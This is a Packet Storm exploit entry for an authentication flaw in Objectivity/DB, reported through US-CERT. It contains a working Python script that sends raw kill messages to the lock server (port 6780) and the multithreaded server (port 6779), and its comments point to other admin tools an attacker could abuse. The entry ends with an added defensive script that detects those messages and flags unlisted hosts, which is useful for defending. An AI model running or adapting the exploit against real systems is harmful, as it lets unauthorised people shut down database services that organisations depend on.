Objectivity/DB Lack Of Authentication

2011-01-14T00:00:00
ID PACKETSTORM:97538
Type packetstorm
Reporter Jeremy Brown
Modified 2011-01-14T00:00:00

Description

                                        
                                            `#!/usr/bin/python  
# obj.py  
# Objectivity/DB Lack of Authentication Remote Exploit  
# Jeremy Brown [0xjbrown41-gmail-com]  
# Jan 2011  
#  
# "Objectivity, Inc. is a leader in distributed, scalable database technology.  
# Our patented data management engine and persistent object store is the enabling  
# technology powering some of the most complex applications and mission critical  
# systems used in government, business and science organizations today."  
#  
# Objectivity/DB includes many different tools for administration. The  
# problem is, anyone can use these tools to perform operations on the host  
# running the lock server, advanced multithreaded server, and probably  
# it's other servers as well, without any authentication. This design flaw  
# puts the host running these servers at risk of potentially unauthorized  
# operations being performed on the system, locally or remotely.  
#  
# This code demostrates a couple of the easiest operations to replicate  
# by hand, like killing the lock and am servers. The suite contains lots  
# of other admin tools that do various, more interesting tasks with the  
# Objectivity/DB, such as oobackup, oonewfd, oodeletefd, oodebug, etc...  
#  
# Tested on Objectivity/DB 10 running on Windows  
#  
# Fixed version: N/A, US-CERT coordinated the communication and released  
# a vulnerability note after the vendor did not provide additional feedback.  
#  
# http://www.kb.cert.org/vuls/id/782567  
#  
  
import sys  
import socket  
  
kill_ooams=(  
"\x0d\x03"+  
"\x00"*5+  
"\x02"+  
"\x00"*3+  
"\x19\xf0\x92\xed\x89\xf4\xe8\x95\x43\x03"+  
"\x00"*15+  
"\x61\x62\x63"+  
"\x00"+  
"\x31\x32\x33\x34"+  
"\x00"*3+  
"\x05\x8c"+  
"\x00"*3+  
"\x0d"+  
"\x00"*4  
)  
  
kill_ools=(  
"\x0d\x03"+  
"\x00"*5+  
"\x77"+  
"\x00"*3+  
"\x04\xad\xc4\xae\xda\x9e\x48\xd6\x44\x03"+  
"\x00"*15  
)  
  
if len(sys.argv)<3:  
print "Objectivity/DB Remote Exploit"  
print "Usage: %s <target> <operation>"%sys.argv[0]  
print "\nWhat would you like to do?\n"  
print "[1] Kill the advanced multithreaded server"  
print "[2] Kill the lock server"  
print "For other operations, check out oobackup, oodebug, etc"  
sys.exit(0)  
  
target=sys.argv[1]  
op=int(sys.argv[2])  
  
if((op<1)|(op>2)):  
print "Invalid operation"  
sys.exit(1)  
  
if(op==1):  
port=6779  
data=kill_ooams  
  
if(op==2):  
port=6780  
data=kill_ools  
  
cs=target,port  
  
sock=socket.socket(socket.AF_INET,socket.SOCK_STREAM)  
sock.connect(cs)  
  
sock.send(data)  
  
sock.close()  
`
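The advisory's core point is that the lock server and advanced multithreaded server act on any client that reaches their ports. The following defender-side example (added here, not part of the advisory or of Objectivity's software) classifies TCP payloads to those two ports: it flags the exact kill messages shown above and, since the servers authenticate nobody, treats any other client outside an admin allow-list as suspect. The flow records, admin allow-list and IP addresses are constructed sample data.

```python
# Added defensive example, not part of the advisory: classify TCP payloads
# sent to the Objectivity/DB ports named above. Signature bytes are copied
# from the advisory's kill_ooams / kill_ools messages; the flow records and
# the admin allow-list below are constructed sample data.
import binascii

OBJY_PORTS = {6779: "advanced multithreaded server (ooams)",
              6780: "lock server (ools)"}

# Leading bytes of the two kill messages shown in the advisory.
KILL_SIGNATURES = {
    6779: b"\x0d\x03" + b"\x00" * 5 + b"\x02" + b"\x00" * 3,
    6780: b"\x0d\x03" + b"\x00" * 5 + b"\x77" + b"\x00" * 3,
}

def classify_flow(src_ip, dst_port, payload, admin_hosts):
    """Return (severity, reason): "alert" for a known kill message,
    "warn" for any other client not on the admin allow-list (the
    servers authenticate nobody, so the allow-list is the only control)."""
    if dst_port not in OBJY_PORTS:
        return "ok", "not an Objectivity/DB port"
    service = OBJY_PORTS[dst_port]
    if payload.startswith(KILL_SIGNATURES[dst_port]):
        return "alert", f"kill message to {service} from {src_ip}"
    if src_ip not in admin_hosts:
        return "warn", f"unlisted host {src_ip} talking to {service}"
    return "ok", f"admin host {src_ip} talking to {service}"

def scan_flows(flows, admin_hosts):
    """flows: (src_ip, dst_port, payload_hex) tuples; returns non-ok findings."""
    findings = []
    for src_ip, dst_port, payload_hex in flows:
        payload = binascii.unhexlify(payload_hex)
        sev, reason = classify_flow(src_ip, dst_port, payload, admin_hosts)
        if sev != "ok":
            findings.append((sev, reason))
    return findings

# Constructed sample flows (hex payloads), not real captures.
SAMPLE_FLOWS = [
    ("10.0.0.5", 6780, "0d030000000000770000000000"),  # lock-server kill bytes
    ("10.0.0.9", 6779, "0d0300000000000a00000000"),    # unknown message, outsider
    ("10.0.0.2", 6779, "0d0300000000000a00000000"),    # same bytes, admin host
    ("10.0.0.9", 443, "1603010200"),                    # unrelated traffic
]
ADMIN_HOSTS = {"10.0.0.2"}

if __name__ == "__main__":
    for sev, reason in scan_flows(SAMPLE_FLOWS, ADMIN_HOSTS):
        print(sev.upper(), reason)
```

The allow-list check matters more than the signatures: the advisory lists further admin tools (oobackup, oodebug, etc.) whose messages are not shown here, so unknown traffic from unlisted hosts is the broader indicator.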